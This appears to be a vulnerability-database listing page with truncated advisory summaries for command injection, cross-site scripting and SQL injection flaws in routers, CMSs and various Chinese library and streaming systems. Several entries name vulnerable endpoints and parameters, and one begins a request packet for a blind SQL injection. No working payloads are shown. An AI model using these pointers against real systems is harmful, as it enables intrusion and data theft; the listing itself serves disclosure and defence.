Tenda Router AC11 - Remote Command Injection
Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. id: CVE-2021-31755 info: name: Tenda Router AC11 - Remote Comman...
CVE-2026-42556
Postiz is an AI social media scheduling tool. From version 2.21.6 to before version 2.21.7, any authenticated user who can create a post can store arbitrary HTML in post content by tampering their own save request and send the public preview link /p/?share=true to another user. The preview page...
PT-2026-20832
Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the openvpn advanced endpoint. Attackers can inject JavaScript code through the GLOBAL NETWORKS and GLOBAL DNS parameters via POST...
PT-2026-5573
Banco Guayaquil 8.0.0 mobile iOS application contains a persistent cross-site scripting vulnerability in the TextBox Name Profile input. Attackers can inject malicious script code through a POST request that executes on application review without user interaction...
GHSA-269J-37WW-CMH3 Mezzanine CMS vulnerable to Cross-site Scripting
A cross-site scripting (XSS) vulnerability in the component /blog/blogpost/add of Mezzanine CMS v6.1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into a blog post...
PT-2025-30602 · Unknown · Mezzanine Cms
Name of the Vulnerable Software and Affected Versions: Mezzanine CMS version 6.1.0. Description: A cross-site scripting (XSS) vulnerability exists in the /blog/blogpost/add component of Mezzanine CMS. This allows attackers to execute arbitrary web scripts or HTML by injecting a crafted payload into ...
SUSE CVE-2013-3241
export.php aka the export script in phpMyAdmin 4.x before 4.0.0-rc3 overwrites global variables on the basis of the contents of the POST superglobal array, which allows remote authenticated users to inject values via a crafted request...
Ghost Foundation Ghost Cross-Site Scripting Vulnerability
Ghost Foundation Ghost is an open source personal blog system written in JavaScript by Ghost. A cross-site scripting vulnerability exists in Ghost Foundation Ghost version 5.9.4. An attacker exploits this vulnerability to send HTTP requests to inject Javascript into posts to trick administrators...
CVE-2022-37721
PyroCMS 3.9 is vulnerable to stored cross-site scripting (XSS) when a low-privileged user, such as an author, injects a crafted HTML and JavaScript payload in a blog post, leading to full admin account takeover or privilege escalation...
Code injection
Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an XFA '\n' POST injection vulnerability. Successful exploitation could lead to a security bypass...
WordPress Plugin Mail Masta 1.0 - SQL Injection
Vulnerability information Vulnerability title: WordPress Plugin Mail Masta 1.0 - SQL Injection Plugin home page: https://wpcore.com/plugin/mail-masta Vulnerability type: SQL injection CVE : CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098 Vulnerability analysis The first injection...
SQL injection vulnerability in DropDownList1 parameter of ScarchList.aspx, a bibliographic data retrieval system of Beijing Jinpan Pengtu Software Technology Co.
Beijing Jinpan Pengtu Software Technology Co., Ltd. is a high-tech enterprise specializing in the research and development of library information automation products, promotion and application and system maintenance. Beijing Jinpan Pengtu Software Technology Co., Ltd. library management system /...
SQL Injection Vulnerability in Marc Parameters of Shenzhen Ketu Automation New Technology Application Company ilasIII Digital Library System xk/zdframe.jsp Page
The Integrated Library Automation System (ILAS) is a national key science and technology project issued by the Ministry of Culture in 1988, which the Shenzhen Library undertook and organized to develop a system suited to libraries at home and abroad of different levels, a variety of scales,...
SQL injection vulnerability in the user_name parameter of Request.aspx page of Nanjing Fargo Streaming Media System.
Nanjing Fargo streaming media system is mainly used for applications such as network TV, live event broadcasting, remote education, enterprise roadshow and multimedia public information service, etc. The system integrates computer, network, audio/video and mobile communication and other related...
SQL Injection Vulnerability in UserGUID Parameter of UserDataSync.aspx Page of Nanjing Fargo Streaming Media System
Nanjing Fargo streaming media system is mainly used for applications such as network TV, live event broadcasting, remote education, enterprise roadshow and multimedia public information service, etc. The system integrates computer, network, audio/video and mobile communication and other related...
The micro-engine technology /payment/unionpay/notify.php POST-injection
No description provided by source...
Jinchuang (金窗) Academic Affairs System: POST injection in /web/web/kebiao/kebiao.asp and other locations (8 in total)
No description provided by source...
E-TILLER journal editorial system: POST injection vulnerabilities in /ch/reader/wait_published_articles.aspx and other locations (8 in total)
No description provided by source...
E-TILLER journal editorial system: POST injection vulnerabilities in /ch/reader/inner_key_query_article_list.aspx and other locations (2 in total)
No description provided by source...
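Blind SQL injection vulnerability in an online training system
Brief description: as per title. Details: Official site: http://.../Login.aspx. A POST injection exists in the check for whether a username already exists during user registration! Also: ...:8000/ is one example. The request packet is as follows: POST /CscAjax/ajax.aspx HTTP/1.1 Host: ... Proxy-Connection: keep-alive Content-Length: 63 Accept: text/html, / Origin: http://... X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 Windows NT 6.1; WOW...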